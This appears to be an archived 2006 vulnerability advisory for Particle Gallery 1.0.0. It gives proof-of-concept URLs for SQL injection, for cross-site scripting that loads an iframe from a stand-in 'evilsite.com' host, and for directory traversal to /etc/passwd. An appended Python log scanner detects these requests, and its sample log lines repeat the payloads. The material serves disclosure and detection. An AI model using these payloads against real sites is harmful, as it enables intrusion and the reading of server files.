Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Calendar Express 2 SQL injection
[SA20465] Coppermine Photo Gallery usermgr.php Unspecified Vulnerability
[SA20475] MiraksGalerie Multiple File Inclusion Vulnerabilities
[SA20436] PyBlosxom Contributed Packages Cross-Site Scripting Vulnerability

From: luny_(at)_youfucktard.com <luny_(at)_youfucktard.com>
Date: 07.06.2006
Subject: Particle Gallery v1.0.0

Homepage: http://www.particlesoft.net/particlegallery/

Affected files:
viewimage.php
viewalbum.php

SQL Injection:
http://www.example.com/viewimage.php?imageid='

XSS Vulnerability proof of concept:
http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsite.com/scriptlet.html>

Possible Directory Traversal ?:
http://www.example.com/viewalbum.php?albumid=../../../../etc/passwd/
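For defenders reviewing web server logs for requests of the kind reported above, the following is an added example, not part of the original advisory or of Particle Gallery's code. It assumes combined-format access log lines and that imageid and albumid are meant to be plain integers; the log lines, the /gallery/ path and the example.invalid host are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: each script takes one id parameter that should be a plain integer.
ID_PARAMS = {"viewimage.php": "imageid", "viewalbum.php": "albumid"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_ID = re.compile(r"[0-9]{1,10}")

# Constructed sample lines (documentation addresses, invented paths and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Jun/2006:10:00:01 +0000] "GET /gallery/viewimage.php?imageid=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [07/Jun/2006:10:02:13 +0000] "GET /gallery/viewimage.php?imageid=%27 HTTP/1.1" 200 310',
    '192.0.2.77 - - [07/Jun/2006:10:02:20 +0000] "GET /gallery/viewimage.php?imageid=%3Ciframe%20src=http://example.invalid/x.html%3E HTTP/1.1" 200 4980',
    '192.0.2.77 - - [07/Jun/2006:10:02:31 +0000] "GET /gallery/viewalbum.php?albumid=../../../../etc/passwd/ HTTP/1.1" 200 290',
    '192.0.2.10 - - [07/Jun/2006:10:03:00 +0000] "GET /gallery/index.php?imageid=%27 HTTP/1.1" 200 2048',
]

def classify(value):
    """Rough label for an id value that is not a plain integer."""
    if "<" in value or ">" in value:
        return "markup"
    if "../" in value or "..\\" in value:
        return "path-traversal"
    if "'" in value or '"' in value:
        return "quote"
    return "non-numeric"

def check_line(line):
    """Return (script, param, value, label) for a flagged request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    param = ID_PARAMS.get(script)
    if param is None:
        return None
    # parse_qsl percent-decodes once; doubly encoded values still fail the integer test.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key.lower() == param and not NUMERIC_ID.fullmatch(value):
            return (script, param, value, classify(value))
    return None

def scan(lines):
    """Return the findings for every flagged line, in input order."""
    return [hit for hit in map(check_line, lines) if hit]

if __name__ == "__main__":
    for script, param, value, label in scan(SAMPLE_LOG):
        print(f"{label:15} {script}?{param}={value!r}")
```

The same integer-only rule is what the application itself would need to enforce on both parameters before using them in a query, a page or a file path.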